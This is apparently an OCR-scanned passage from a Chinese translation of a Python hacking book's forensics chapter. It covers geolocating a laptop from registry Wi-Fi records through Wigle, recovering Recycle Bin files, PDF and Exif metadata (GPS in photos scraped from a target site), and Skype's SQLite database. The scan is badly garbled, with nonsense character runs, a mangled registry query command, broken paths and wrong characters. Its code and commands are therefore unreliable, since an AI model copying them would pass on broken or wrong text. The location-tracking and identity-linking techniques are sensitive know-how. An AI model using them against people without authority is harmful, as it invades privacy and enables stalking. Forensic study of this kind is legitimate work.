。 检查 移动 设备 连接 记录 


最 终 ， 你 要 忘掉 所 有 的 招 法 。 你 的 水 平 越 高 ， 心 中 的 招 法 就 越 少 ， 最 高 境 
JA: 无 招 胜 有 招 。 


一 一 植 芝 盛 平 ， 合 气 道 创始 人 ， 一 代 宗 师 


引言 : 如 何 通过 电子 取证 解决 BTK 凶 杀 案 


2005 年 2 H, Wichita 市 警察 局 取证 组 探 员 Randy Stone 警官 揭 开 了 一 个 持续 30 年 之 久 的 
谜团 。 在 这 之 前 不 久 ，KSAS 电视 台 把 一 张 从 奥 名 昭著 的 BTK (Bind, Torture, Kill) 杀人 犯 那 
里 收 到 的 3.5 寸 软盘 交 给 了 警方 。 从 1974 至 1991 年 ， 这 个 BTK 杀人 狂 魔 已 经 杀害 至 少 10 个 
人 ， 他 一 直 不 断 地 嘲弄 警方 和 被 害 者 一 一 并 始终 道 遥 法 外 。2005 年 2 月 16 日 ， 在 这 个 魔鬼 寄 
给 电视 台 的 3.5 寸 盘 里 存 有 他 的 联系 方式 。 这 些 联系 方式 被 存放 在 一 个 名 为 “Test.A.rtf” 
(Regan，2006) 的 文件 中 。 而 这 个 文件 中 除了 与 这 个 罪犯 联系 的 方式 外 ， 还 记录 有 其 他 信息 一 
一 元 数据 ， 即 被 典 在 微软 的 富 文本 格式 (Rich Text Format, RTF) 文件 中 的 元 数据 。 文 件 里 
的 元 数据 中 含有 这 个 凶 犯 的 第 一 个 名 和 物理 位 置 一 一 用 户 最 后 一 次 是 在 哪里 保存 的 文件 。 

这 就 把 调查 方向 直接 指 癌 了 Wichita 市 本 地 基督 教会 里 的 一 个 名 叫 Denis 的 男子 。Stone 


77 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


警官 进一步 验证 该 男子 为 一 名 叫 作 Denis Rader 的 路 德 宗教 区 执事 (Regan, 2006) 。 掌 握 这 一 
信息 之 后 ， 警 方 同 法 性 申请 从 Denis Rader 的 女儿 的 医疗 记录 中 获取 了 一 份 DNA FFA. DNA 
样本 证 实 了 Stone 警官 的 猜测 一 一 Denis Rader 就 是 那个 杀人 狂 魔 。 一 起 持续 了 31 年 的 调查 ， 
花费 了 100000 个 工时 ， 终 于 由 Stone 警官 对 元 数据 的 分 析 而 画 上 了 圆满 的 句号 (Regan, 
2006) 。 

只 要 调查 人 员 手 中 有 现成 的 工具 ， 电 子 取 证 就 不 会 让 我 们 失望 。 可 是 在 太 多 的 情况 下 ， 
调查 人 员 确 实 能 提出 一 大 堆 的 问题 ， 但 没有 哪个 现成 的 工具 能 够 回答 这 些 问题 。 这 时 ， 写 一 
个 Python 脚本 就 像 我 们 在 前 两 章 中 看 到 的 那样 ) 就 能 用 窒 灾 数 行 代 码 解 决 非常 复杂 的 问 
题 ， 这 凸显 了 Python 程序 设计 语言 的 强大 。 在 下 和 面 的 内 容 中 我 们 将 看 到 ， 我 们 用 很 少 的 几 行 
Python 代码 就 能 回答 相当 复杂 的 一 些 问题 。 我 们 先 用 一 些 独 特 的 Windows 注册 表 键 值 来 追踪 
一 下 用 户 的 物理 位 置 。 


你 曾经 去 过 哪里 ? 一 一 在 注册 表 中 分 析 无 线 访问 热点 


Windows 注册 表 是 一 个 分 层 式 的 数据 库 ， 其 中 存储 了 操作 系统 的 配置 设置 信息 。 随 着 无 
线 网 络 时 代 的 来 临 ，Windows 注册 表 中 也 会 存储 无 线 连 接 相 关 的 信息 。 了 解 这 些 注册 表 键 值 
的 所 在 位 置 和 含义 后 ， 能 够 癌 我 们 提供 笔记 本 曾经 被 带 到 哪里 去 过 的 地 理 位 置信 息 。 从 
Windows Vista 起 ， 注 册 表 在 HKLM\SOFT-WARE\Microsoft\Windows NT\CurrentVersion\ Network- 
List Signatures\Unmanaged 子 键 中 就 会 存储 所 有 的 网 络 信息 。 在 Windows 命令 行 提示 符 中 ， 我 
们 能 列 出 每 个 网 络 显示 出 profile Guid 对 网 络 的 描述 、 网 络 名 和 网 关 的 MAC 地 址 。 

C:\Windows\system32>reg quey CAREY, _LOCAL MMC HIM NSO TARR Mono Roce) 

= Windows NT\ 
nL Een SAL emptor. aoe a /s 
HKEY LOCAL MACHINE\SOFTWARE\Microsoft \Windows 


NT\CurrentVersion\NetworkList\Sign | 
atures\Unmanaged\010103000F0000F0080000000F0000F04BCC2360E4B8F7DCBBDAF 


AB8AE4DAD8 
| 623960B979A7AD52FA5F70188E103148 
ProfileGuid REG SZ {3B24CE70-AA79- 4c9A-B9CC-B83F90C2C9COD} 
Description REG SZ Hooters San Pedro 
SOUTO r = REG DWORD 0x8 | | n-i FRAPS 7 gf PSD 
DnssSubtix> \\ REG SZ <none> | Ro f 
FirstNetwork REG SZ Public Library l 


DefaultGatewayMac REG BINARY 00115024687F0000 
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使 用 WinReg 读 取 Windows 注 册 表 中 的 内 容 


注册 表 中 把 网 关 MAC 地 址 存 为 REG BINARY 类 型 的 。 在 上 面 这 个 例子 中 ， 它 的 十 六 进 
制 值 是 xw00x11x50w24\x68x7F\x00w00， 也 就 是 实际 的 地 址 00:11:50:24:68:7F。 我 们 要 写 一 
个 快捷 的 函数 ， 把 REG_BINARY 值 转换 成 一 个 实际 的 MAC 地 址 。 知 道 无 线 网 络 的 MAC 地 
址 是 很 有 用 的 ， 就 像 我 们 马上 会 看 到 的 那样 。 






现在 ， 让 我 们 来 写 一 个 函数 ， 从 Windows 注册 表 指 定 的 键 值 中 提取 各 个 被 列 出 来 的 网 络 
名 称 和 MAC 地 址 。 为 达到 这 一 目的 ， 我 们 需要 使 用 _winreg 库 ， 这 是 Python 的 Windows 版 
安装 程序 默认 会 安装 的 一 个 库 。 在 连 上 注册 表 之 后 ， 我 们 可 以 使 用 OpenKey() 函 数 打 开 相 关 的 
键 ， 在 循环 中 依次 分 析 该 键 下 存储 的 所 有 网 络 (network profile) ， 对 每 个 网 络 (profile) 都 
会 含有 如 下 子 键 : ProfileGuid 、Description 、Source 、DnsSuffix FirstNetwork 和 Default- 
GatewayMac。 表 示 网 络 名 和 默认 网 关 的 MAC 的 键 分 别 是 这 个 数组 中 的 第 4 个 和 第 5 个 。 我 
们 现在 可 以 枚 举 出 所 有 网 络 的 这 两 个 键 ， 并 把 它们 打印 在 屏幕 上 。 
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把 所 有 这 些 放 在 一 起 ， 现 在 就 有 了 一 个 能 把 存储 在 Windows 注册 表 中 的 之 前 连 过 哪些 无 
线 网 络 的 脚本 。 


AR NS) eT > 
Ia ae i 证 本 
tte as 


A i 
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‘ PE 
= fl fi jí 
a ae O A 
Tig 


在 你 的 目标 笔记 本 电脑 上 运行 我 们 的 脚本 ， 我 们 将 看 到 之 前 连 过 的 无 线 网 络 及 它们 的 
MAC 地 址 。 在 测试 这 个 脚本 时 ， 请 确保 你 是 在 一 个 拥有 管理 员 权限 的 命令 行 窗口 中 运行 它 ， 
否则 ， 将 无 法 读 取 注 册 表 中 的 键 值 。 
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使 用 Mechanize 把 MAC 地 址 传 给 Wigle 


这 个 脚本 可 不 会 止步 于 此 。 知 道 了 无 线 访问 热点 的 MAC 地 址 之 后 ， 我 们 现在 还 可 以 把 访 
问 热 点 的 物理 位 置 也 打印 出 来 。 在 许多 数据 库 中 ， 既 有 开源 的 ， 也 有 收费 的 ， 都 有 海量 的 把 
无 线 访问 热点 与 它们 所 在 的 物理 位 置 相对 应 起 来 的 列表 。 一 些 特 许 专卖 产品 〈 比 如 手机 ) 使 
用 这 些 数据 库 获取 地 理 位 置信 息 ， 而 不 需要 使 用 GPS. 

SkyHook 数据 库 〈 网 址 http://www.skyhookwireless.com/) 提供 了 一 个 根据 Wi-Fi 的 位 置 
获取 地 理 位 置信 息 的 软件 开发 包 。 自 从 多 年 以 前 ，Ian McCracken 开发 的 一 个 开源 项 目 〈 网 址 
http://code.google.com/p/maclocate/) 让 我 们 能 访问 这 个 数据 库 。 不 过 ， 最 近 SkyHook 修改 了 
SDK， 用 一 个 API key 对 数据 库 进 行 交互 操作 。 人 谷歌 也 维护 了 一 个 类 似 的 大 数据 库 ， 以 把 无 
线 访问 热点 的 MAC 地 址 与 实际 的 物理 地 址 关联 起 来 。 不 过 ， 之 后 不 久 ，GorjanPetrovski 开发 
了 一 个 能 对 它 进行 交互 操作 的 NMAP NSE 脚本 ， 可 是 谷歌 拒绝 开发 与 该 数据 库 交 互 操作 的 源 
码 〈 谷 歌 , 2012; Petrovski, 2011) 。 在 之 后 不 久 ， 微 软 也 以 泄露 隐私 问题 为 由 ， 关 闭 了 一 个 类 
似 的 Wi-Fi 地 理 位 置 数据 库 。 

剩 下 的 一 个 数据 库 也 是 一 个 开源 项 目 ， 就 是 wigle.net， 它 仍然 允许 用 户 根据 无 线 访 问 热 
点 的 MAC 地 址 得 到 它 所 在 的 物理 位 置 。 在 注册 一 个 账号 之 后 ， 用 户 就 可 以 编写 一 个 小 小 的 
Python 脚本 对 wigle.net 进行 操作 。 下 面 大 致 介绍 一 下 怎么 编写 这 个 操作 wigle.net 的 脚本 。 

要 使 用 wigle.net， 用 户 马 上 意识 到 : 要 能 得 到 Wigle 返回 的 结果 ， 他 /她 必须 对 三 个 独立 
的 页 面 进行 操作 。 首 先 ， 他 要 去 访问 wigle 的 主页 http://wigle.net， 接 下 来 ， 他 要 在 网 页 
http://wigle.net//gps/gps/main/login 中 完成 登录 操作 。 最 后 ， 用 户 还 要 在 http://wigle.net/gps/ 
gps/main/confirmquery/ 页 面 查询 某 个 无 线 SSID MAC 地 址 对 应 的 物理 位 置 。 在 进行 查询 时 ， 
我 们 看 到 在 请 求 查询 无 线 访问 热点 的 HTTP POST 请 求 中 ， 是 把 MAC 地 址 放 在 netid 参数 中 
传 给 服务 器 的 。 

POST /gps/gps/main/confirmquery/ HTTP/1.1 

Accept-Encoding: identity 

Content-Length: 33 

Host: wigle.net 

User-Agent: i Be A K 1, 

Connection: close . 

Content-Type: application/x-www-form-urlencoded 

netid=0A%3A2C%3AEFS3A3D%3A25%3A1B 

< e SNIPPED... > 


随后 ， 我 们 看 到 了 含有 GPS 坐标 的 啊 应 页 面 ， 其 中 的 字符 串 maplat= 47.25264359 
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&maplon=-87.25624084 表示 的 就 是 无 线 访 问 热点 的 经 度 和 纬度 。 


3. = A E. ss Ol pa "A 
|) z 
fi rA I 
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wm Ey S s KA 上 4 - 下 
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知道 这 些 以 后 ， 我 们 现在 就 能 编写 一 个 简短 的 函数 ， 从 Wigle 数据 库 的 记录 中 得 到 无 线 
访问 热点 的 经 纬度 。 注 意 ， 我 们 要 使 用 mechanize 库 ， 其 下 载 地 址 是 : http:/wwwsearch. 
sourceforge. net/mechanize/. mechanize 允许 用 Python 编写 带 状态 的 Web 程序 。 也 就 是 说 ， 在 
我 们 正确 地 登录 Wigle 服务 器 后 ， 它 就 会 保存 和 重用 我 们 的 登录 认证 cookie. 

这 个 脚本 看 上 去 好 像 有 点 复杂 ， 但 还 是 让 我 们 一 起 逐 行 代码 地 过 一 遍 吧 。 首 先 ， 创 建 一 
个 mechanize 浏览 器 的 实例 。 接 下 来 ， 我 们 会 打开 wigle.net 的 主页 。 然 后 在 Wigle 登录 页 面 
请 求 登 录 ， 并 把 我 们 的 用 户 名 和 密码 放 在 请 求 的 参数 里 发 送 过 去 。 在 成 功 登 录 之 后 ， 我 们 创 
建 一 个 HTTP post 请 求 ， 把 要 查询 的 MAC 地 址 放 在 netid 参数 中 。 在 收 到 HTTP post 请 求 的 
响应 结果 之 后 ， 我 们 搜索 字符 串 “maplat=” 和 “maplon=” 以 获取 经 度 和 纬度 坐标 。 在 得 到 
它们 之 后 就 把 它们 成 对 地 打印 出 来 。 





Fe -4 
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把 用 Wigle 查询 MAC 地 址 的 功能 加 到 我 们 最 初 的 脚本 中 ， 现 在 我 们 就 能 通过 检查 注册 表 
知道 计算 机 之 前 连接 过 哪些 无 线 访问 热点 ， 以 及 这 些 热 点 的 物理 位 置 。 
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运行 这 个 增加 了 新 功能 的 脚本 后 ， 我 们 现在 就 能 看 到 之 前 连接 过 的 无 线 网 络 及 其 物理 地 
址 。 在 知道 怎样 获取 计算 机 曾经 去 过 的 地 方 之 后 ， 我 们 再 来 看 下 一 节 一 一 如 何 检查 回收 站 。 
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用 Python 恢复 被 删 入 回收 站 中 的 内 容 


在 微软 操作 系统 中 ， 回 收 站 就 是 一 个 专门 用 来 存放 被 删除 的 文件 的 特殊 文件 夹 。 当 用 户 
通过 Windows 窗口 删除 文件 时 ， 操 作 系统 就 会 把 被 删除 的 文件 移动 到 这 个 特殊 的 文件 夹 中 ， 
并 把 它们 标记 为 已 删除 ， 而 不 是 真 的 把 它们 删除 掉 。 在 使 用 FAT 文件 系统 的 Windows 98 及 
之 前 的 Windows 系统 中 ， 回 收 站 目录 是 C:\Recycled\。 在 包括 Windows NT/2000 和 Windows 
XP 在 内 的 支持 NTFS 的 操作 系统 中 ， 回 收 站 是 CRecyclenN 目 录 。 在 Windows Vista 和 
Windows 7 中 ， 回 收 站 目录 则 是 C:\$Recycle.Bin。 


使 用 OS 模块 寻找 被 删除 的 文件 /文件 夹 


为 了 让 我 们 的 程序 不 会 只 运行 在 特定 版 本 的 操作 系统 上 ， 我 们 先 来 写 一 个 函数 ， 用 它 来 
逐一 测试 各 个 可 能 的 回收 站 目录 是 否 存在 ， 并 返回 首先 遇 到 的 系统 中 存在 的 回收 站 目录 。 






在 找到 回收 站 目录 之 后 ， 就 要 去 检查 其 中 的 内 容 。 注 意 ， 其 中 有 两 个 子 目 录 ， 它 们 都 含 
有 字符 串 S-1-5-21- 1275210071-1715567821-725345543-, F£4> HI LA 1005 或 500 结尾 。 这 个 字 
符 串 表 示 的 是 用 户 的 SID， 它 对 应 的 是 机 器 里 一 个 唯一 的 用 户 账户 。 
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用 Python 把 SID 和 用 户 名 关联 起 来 


我 们 可 以 使 用 Windows 注册 表 把 这 个 SID 转换 成 一 个 准确 的 用 户 名 。 检 查 的 是 注册 表 键 
HKEY LOCAL MACHINE\SOFT-WARE\Microsoft\Windows NT\CurrentVersion\ProfileList\<SID>\ 
ProfilelmagePath, Æ FNR El H %SystemDrive%\Documents and Settings\<USERID> 值 。 在 下 
面 的 代码 中 ， 我 们 看 到 它 允 许 我 们 直接 把 SID S-1-5-21-1275210071-1715567821-725345543- 
1005 转换 成 用 户 名 “alex”。 
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因为 我 们 想 要 知道 是 谁 把 文件 删 入 到 回收 站 里 了 ， 所 以 让 我 们 写 个 简短 的 函数 ， 把 每 个 
SID 都 转换 成 对 应 的 用 户 名 。 这 使 我 们 在 恢复 被 删 入 回收 站 中 的 文件 /文件 夹 时 ， 能 打印 出 一 
些 更 有 用 的 信息 。 这 个 函数 将 会 打开 注册 表 检 查 ProfilelmagePath 键 ， 提 取出 其 中 存放 的 值 ， 
并 返回 位 于 用 户 路 径 中 最 后 一 个 反 斜 杠 之 后 的 用 户 名 。 


-一 CC 一 wm Eee 






最 后 ， 我 们 把 所 有 的 这 些 都 放 在 一 起 ， 创 建 一 个 能 打印 出 所 有 被 删 入 回收 站 的 文件 的 
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在 目 标 计 算 机 上 运行 我 们 的 代码 ， 我 们 看 到 脚本 发 现 了 两 个 用 户 : alex 和 Administrator. 
它 分 别 列 出 了 每 个 用 户 删 入 回收 站 的 所 有 文件 。 在 下 一 节 将 介绍 一 种 检查 文件 中 的 一 些 对 调 
查 取证 可 能 非常 有 用 的 方法 。 





Python 绝技 : 运用 Python 成 为 顶级 黑客 





元 数据 

本 节 将 编写 几 个 能 从 某 些 类 型 的 文件 中 提取 元 数据 的 脚本 。 作 为 一 种 文件 里 非 明显 可 见 
的 对 象 ， 元 数据 可 以 存在 于 文档 、 电 子 表格 、 图 片 、 音 频 和 视频 文件 中 。 创 建 这 些 文件 的 应 
用 程序 可 能 会 把 文档 的 作者 、 创 建 和 修改 时 间 、 可 能 的 更 新 版 本 和 注释 这 类 详细 信息 存储 下 
来 。 例 如 ， 手 机 照相 机 会 把 照片 的 GPS 位 置信 息 存 下 来 ， 微 软 的 Word 程序 也 可 能 会 保存 文 
档 的 作者 信息 。 而 逐一 检查 所 有 的 文件 显然 是 一 件 吃力 不 讨好 的 活 儿 ， 我 们 应 该 用 Python 自 
动 完成 这 一 任务 。 


使 用 PyPDF 解 析 PDF 文 件 中 的 元 数据 


让 我 们 用 Python 来 快速 重 现 一 次 对 一 个 文档 的 取证 调查 过 程 。 这 一 招 在 逮捕 一 个 黑客 组 
织 的 某 个 成 员 的 过 程 中 被 证 明 是 非常 有 用 的 。 在 这 个 黑客 组 织 的 网 站 中 至 今 还 能 下 载 到 我 们 
要 分 析 的 这 个 文件 一 -ANONOPS The Press_Release.pdf。 我 们 首先 用 wget 这 个 实用 程序 把 
它 下 载 下 来 。 
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案例 解析 


匿名 者 组 织 的 元 数据 之 败 
2010 年 12 月 10 日 ， 黑 客 组 织 匿名 者 发 布 了 一 条 消息 ， 解 释 了 他 们 发 起 最 近 一 次 
代号 为 “复仇 行动 ”的 攻击 的 大 致 动机 ( Prefect，2010 )。 由 于 被 那些 放弃 支持 维基 解 
密 网 站 的 公司 所 激怒 ， 匿 名 者 组 织 号 召 要 通过 对 涉及 的 一 些 机构 进 行 分 布 式 拒绝 服务 
攻击 (DDoS ) 以 实现 报复 。 这 个 稿子 上 既 没 有 签名 ,也 没有 标注 消息 来 源 ， 只 是 以 
PDF ( Portable Document Format， 便 携 式 文 档 格 式 ) 文件 的 形式 被 发 布 出 来 。 但 是 ， 
创建 这 个 文档 所 用 的 程序 在 PDF 元 数据 中 记录 了 文档 作者 的 名 字 一 一 Alex Tapanaris Æ 
生 。 几 天 后 ， 和 希腊 警方 就 巡捕 了 Tapanaris 先生 (Leyden，2010 )。 












PYPDF 是 一 款 很 优秀 的 管理 PDF 文档 的 第 三 方 实 用 程序 ， 你 可 以 去 
http://pybrary.net/pyPdf/ 下 载 它 。 它 允许 提取 文档 中 的 内 容 ， 或 对 文档 进行 分 割 、 合 并 、 复 
制 、 加 密 和 解密 操作 。 若 要 提取 元 数据 ， 我 们 可 以 使 用 .getDocumentInfo() 方 法 ， 该 方法 会 返 
回 一 个 tuple 数组 ， 每 个 tuple 中 都 含有 对 元 数据 元 素 的 一 个 描述 及 它 的 值 。 逐 一 过 历 这 个 数 
组 ， 就 能 打印 出 PDF 文档 的 所 有 元 数据 。 


import pyPdf 
from pyPdf import PdfFileReader 
def printMeta(fileName) : 
pdfFile = PdfFileReader(file(fileName, 'rb')) 
dociInfo = pdfFile.getDocumentinfo () 
print '[*] PDF MetaData For: ' + str(fileName) 
for metaItem in docInfo: 
print '[+] ' + metaItem + ':' + docInfo[metaItem] 


再 添加 一 个 OptionParser 方法 ， 让 脚本 只 解析 我 们 指定 文件 的 元 数据 ， 这 样 我 们 就 有 了 一 
个 能 识别 嵌入 在 PDF 文档 中 元 数据 的 工具 。 同 样 ， 我 们 也 可 以 修改 我 们 的 脚本 ， 去 检查 茶 个 
特定 的 元 数据 一 一 比如 指定 的 用 户 。 当 然 ， 这 也 可 以 帮助 希腊 的 执法 官员 搜索 出 所 有 “ 作 
者 ”这 一 元 数据 被 标记 为 Alex Tapanaris 的 文档 。 

import pyPdf 

import optparse 

from pyPdf import PdfFileReader 


def printMeta (fileName): 
pdfFile = PdfFileReader(file(fileName, 'rb')) 
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> -y 





对 匿名 者 网 站 发 布 的 这 个 文件 运行 这 个 pdfReader 脚本 ， 我 们 就 能 看 到 导致 希腊 当局 逮捕 
Tapanaris 先生 的 元 数据 。 





理解 Exif 元 数据 


Exif (exchange image file format， 交 换 图 像 文 件 格式 ) 标准 定义 了 如 何 存储 图 像 和 音频 文 
件 的 标准 。 数 码 相机 、 智 能 手机 和 扫描 仪 之 类 的 电子 设备 都 是 用 这 一 标准 存储 音频 或 图 像 文 
件 的 。Exif 标准 中 含有 多 个 对 取证 调查 非常 有 用 的 标签 (tag) ，Phil Harvey 编写 了 一 个 名 副 
其 实 的 工具 一 一 exiftool (下 载 地 址 : http://www.sno.phy.queensu.ca/~phil/exiftool/)， 用 它 可 以 
解析 这 些 标签 。 要 是 把 图 片 中 所 有 标签 的 解析 结果 都 显示 出 来 ， 几 张 纸 都 打印 不 下 ， 所 以 我 
们 在 下 面 只 截取 了 其 中 一 部 分 标签 的 解析 结果 。 请 注意 ， 下 面 给 出 的 Exit 标签 中 包括 内 容 为 
“iPhone 4S” 的 “camera model name” 标 签 ， 以 及 这 张 照片 拍摄 时 的 经 纬度 。 这 些 信息 在 显示 
照片 时 很 有 用 ， 比 如 Mac OS X 中 的 应 用 程序 iPhoto 就 会 使 用 这 些 地 理 位 置信 息 把 照片 显示 
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在 一 张 世 界 地 图 中 的 对 应 位 置 上 。 但 这 些 信息 在 很 多 情况 下 也 会 被 恶意 使 用 。 假 设 一 个 士兵 
把 他 的 一 些 带 有 Exif 标签 的 照片 放 在 他 的 博客 或 Web 网 站 上 ， 那 么 敌 军 就 可 以 下 载 这 些 照 
片 ， 并 在 很 短 的 时 间 里 掌握 这 名 士兵 的 活动 轨迹 。 在 下 一 节 中 ， 我 们 将 便携 一 个 脚本 连接 一 
个 Webl 站 点 ， 下 载 网 站 中 所 有 的 照片 ， 并 检查 它们 的 Exif 元 数据 。 


Wu } i y AN IE Je H IE cy : | 
| “全 - J 7 at Toate) 4 mh | .Rh ue eA Aay Wi To Nien k Pb ae Aa L ee Heel DTU dh ENUEN AE VEIRAI 
d - wWtroc rat mn ws he A, L wh Va?) TOA. We Wale 3 
i j Popi tie DN a é 7 » il ECI | ba PECE C SB uA". H | ahi 





用 BeautifulSoup 下 载 图 片 


BeautifulSoup 软件 允许 我 们 快速 解析 HTML 和 XML 文档 ， 下 载 地 址 为 : http://www. 
crummy.com/software/BeautifulSoup/。Leonard Richardson 最 近 一 次 是 在 2012 年 5 月 29 日 发 布 
了 最 新 一 版 的 Beautiful Soup。 如 果 你 用 的 是 Backtrack， 要 想 更 新 到 最 新 版 本 ， 只 需 使 用 
easy_install 下 载 并 安装 beautifulsoup4 库 即 可 。 
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本 节 将 使 用 Beautiful Soup 解析 HTML 文档 的 内 容 ， 并 找 出 文档 中 所 有 的 图 片 。 注 意 ， 
我 们 是 使 用 urllib2 库 来 打开 文档 的 内 容 和 读 取 它 的 。 接 下 来 ， 创 建 一 个 Beautiful Soup 对 象 或 
称 之 为 一 棵 含有 HTML 文档 中 不 同 对 象 的 解析 树 。 对 这 个 对 象 使 用 method.findall(‘img') A A 
进行 搜索 ， 把 所 有 被 标 为 image 的 标签 都 找 出 来 。 这 个 方法 会 返回 一 个 所 有 被 标 为 image 标 
签 的 数组 ， 我 们 也 把 它 作 为 这 个 函数 的 返回 值 。 









接 下 来 ， 我 们 需要 从 站 点 中 把 每 张 图 片 都 下 载 下 来 ， 以 便 在 一 个 专门 的 函数 中 对 它 进行 
处 理 。 在 下 载 图 片 时 ， 我 们 需要 使 用 urllib2urlparse 和 OS 模块 中 的 函数 。 首 先 ， 从 被 标 为 
image 的 标签 中 提取 图 片 的 原始 地 址 。 接 下 来 ， 把 图 片 的 二 进 制 内 容 读 取 到 一 个 变量 中 。 最 
后 ， 以 二 进 制 写 模式 打开 一 个 文件 ， 并 把 图 片 文件 的 内 容 写 进去 。 





用 Python 的 图 像 处 理 库 读 取 图 片 中 的 Exif 元 数据 


为 了 读 取 图 片 文件 的 内 容 ， 以 解析 出 其 中 的 元 数据 ， 我 们 要 用 Python 的 图 像 处 理 库 PIL 


92 


第 3 章 用 Python 进行 取证 调查 


(下 载 地 址 : http://www.pythonware. com/products/pil/) 来 处 理 文 件 。PIL 给 Python 增加 了 一 些 
图 像 处 理 的 能 力 ， 让 我 们 能 快速 提取 与 地 理 位 置信 息 相关 的 元 数据 。 为 了 获取 文件 中 的 元 数 
据 ， 我 们 要 新 建 一 个 PIL 的 Image 对 象 ， 然 后 使 用 它 的 _getexif0) 方 法 。 接 下 来 ， 我 们 把 Exif 
数据 解析 到 一 个 以 元 数据 类 型 为 索引 的 数组 中 。 解 析 完 毕 后 ， 我 们 可 以 搜索 这 个 数组 ， 看 看 
其 中 是 否 含有 Exif 标签 “GPSInfo”。 如 果 其 中 含有 “GPSInfo” 标 签 ， 就 可 知 对 象 中 含有 
GPS 元 数据 ， 这 时 ， 我 们 就 可 以 在 屏幕 上 输出 一 条 消息 。 


把 所 有 的 这 些 都 放 在 一 起 ， 我 们 的 脚本 现在 能 够 连接 一 个 URL 地 址 ， 解 析 并 下 载 到 所 有 
的 图 片 文件 ， 然 后 检查 每 张 图 片 文件 的 元 数据 。 注 意 ， 在 main 函数 中 ， 我 们 先 得 到 一 张 站 点 
中 所 有 图 片 文件 的 列表 ， 然 后 逐一 下 载 和 检查 数组 中 每 张 图 片 文件 的 GPS 元 数据 。 
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用 一 个 目标 地 址 测试 这 个 新 创建 的 脚本 ， 我 们 看 到 : 目标 站 点 中 有 一 个 图 片 文件 中 含有 
GPS 元 数据 信息 。 这 一 招 可 以 被 用 在 对 单个 目标 嫌疑 人 进行 主动 侦查 的 场景 中 ， 我 们 还 可 以 
以 一 种 完全 无 害 的 方式 使 用 这 个 脚本 一 一 在 遭 到 攻击 之 前 ， 找 出 我 们 自己 网 站 中 的 漏洞 。 

forensics: # python exifFetch.py -u 

http://www.flickr.com/photos/dvids/4999001925/sizes/o 

[+] Finding images on 

http://www. flickr.com/photos/dvids/4999001925/sizes/o 

[+] Dowloading image... 

[+] Dowloading image... 

[+] Dowloading image... 

[+] Dowloading image... 

[+] Dowloading image.. | | 

[*] 4999001925 ab6da92710 o.jpg contains GPS MetaData 

[+] Dowloading image... | 

[+] Dowloading image... 

[+] Dowloading image... 

[+] Dowloading image... 


用 Python 分 析 应 用 程序 的 使 用 记录 


本 节 将 会 检查 应 用 程序 的 使 用 记录 ， 即 两 款 主流 应 用 程序 存储 在 SQLite 数据 库 中 的 数 
据 。 各 种 不 同 的 应 用 程序 需要 在 本 地 /客户 端 中 存储 数据 时 ， 使 用 SQLite 通常 是 一 个 不 错 的 选 
项 。 特 别 是 有 不 能 依赖 于 某 种 编程 语言 要 求 的 Web 浏览 器 。 不 像 一 般 的 数据 库 必 须要 有 服务 
器 一 客户 端 关系 ，SQLite 把 整个 数据 库 都 存放 在 主机 上 一 个 单一 的 不 分 层 的 文件 中 。 在 最 初 
由 RichardHipp 博士 在 为 美国 海军 服务 时 创建 之 后 ，SQLite 数据 库 在 许多 主流 应 用 程序 中 被 使 
用 ， 使 用 率 不 断 增 加 。 苹 果 、Mozilla、 人 谷歌、McAfee、 微 软 、Intuit、 通 用 电气 、DropBox 和 
Adobe， 甚 至 是 空 客 都 在 使 用 SQLite 数据 库 〈(SQLite，2012) 。 理 解 如 何 解析 SQLite 数据 
库 ， 使 用 Python 自动 完成 操作 ， 在 取证 调查 工作 中 是 非常 重要 的 。 首 先 检 查 主 流 的 聊天 客户 
端 程序 一 一 Skype VoIP 中 使 用 的 SQLite 数据 库 。 


理解 Skype 中 的 SQLite3 数 据 库 


从 Skype 4.0 起 ，Skype“〈 一 款 主流 聊天 应 用 程序 ) 把 内 部 数据 库 改 成 了 Skype (Kosi2801., 
2009) 。 在 Windows 系统 中 ，Skype 在 “C:\Documents and Settings\ <User>\ ApplicationData\ 
Skype\<Skype-account>” 目 录 中 存储 了 一 个 名 为 main.db 的 数据 库 。 在 MAC OS X 系统 中 ， 
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这 个 数据 库 的 存储 路 径 为 “/Users/<User>/Library/Application Support/ Skype/<Skype- 
account>”。 那 么 Skype 在 数据 库 中 又 存 了 些 什么 呢 ? 为 了 能 更 好 地 理解 Skype 使 用 的 
SQLite 数据 库 中 的 表 结 构 ， 我 们 用 SQLite 命令 行 工具 快速 连接 数据 库 。 连 接 之 后 ， 执 行 下 
面 这 条 命令 : 

SELECT tbl name FROM sqlite_ master WHERE type=="table" 

SQLite 数据 库 维 护 一 张 名 为 “sqlite_ master” 的 表 ， 这 张 表 中 含有 一 个 名 为 “tbl name” 
的 列 ， 其 中 描述 了 数据 库 中 的 各 张 表 。 执 行 下 面 这 条 SELECT 语句 就 可 看 到 Skype 使 用 的 
main.db 数据 库 中 的 表 结 构 。 现 在 我 们 可 以 看 到 ， 数 据 库 中 有 多 张 表 ， 其 中 分 别 记录 了 联系 
人 、 呼 叫 记录 、 账 户 、 消 息 ， 甚 至 短 消息 等 信息 。 






Accounts 表 中 记录 了 使 用 该 应 用 程序 的 用 户 账户 的 相关 信息 ， 其 中 的 各 列 记录 了 用 户 
名 、Skype 的 昵称 、 用 户 的 位 置 和 创建 该 账户 的 日 期 等 信息 。 为 了 获取 这 些 信息 ， 我 们 要 写 一 
个 查询 它们 的 SELECT SQL 语句 。 注 意 ， 数 据 库 是 以 UNIX 时 间 格 式 存储 账户 创建 时 间 的 ， 
我 们 还 得 把 它 转换 成 对 用 户 更 友好 的 格式 。UNIX 时 间 格 式 是 一 种 比较 简单 的 记录 时 间 的 方 
式 ， 它 用 一 个 表示 当前 时 间距 离 1970 年 1 月 1 日 多 少 秒 的 整 型 数 来 记录 时 间 。SQL 方法 
datetime() 可 以 把 这 个 值 转换 成 更 方便 阅读 的 格式 。 


96 


第 3 章 用 Python 进行 取证 调查 





使 用 Python 和 SQLite3 自 动 查询 Skype 的 数据 库 


尽管 连 上 数据 库 并 执行 SELECT 语句 还 是 很 方便 的 ， 但 我 们 还 是 想 自动 化 这 个 过 程 ， 并 
从 数据 库 的 不 同 表 和 表 的 不 同 列 中 提取 数据 。 让 我 们 写 一 个 简短 的 Python 程序 ， 利 用 
SQLite3 库 完成 这 一 任务 。 注 意 ，printProfile() 函 数 连接 了 main.db 数据 库 ， 在 创建 连接 之 后 ， 
它 申请 了 一 个 游标 (cursorprompt) ， 然 后 执行 上 面 给 出 的 SELECT 语句 ， 该 SELECT 语句 执 
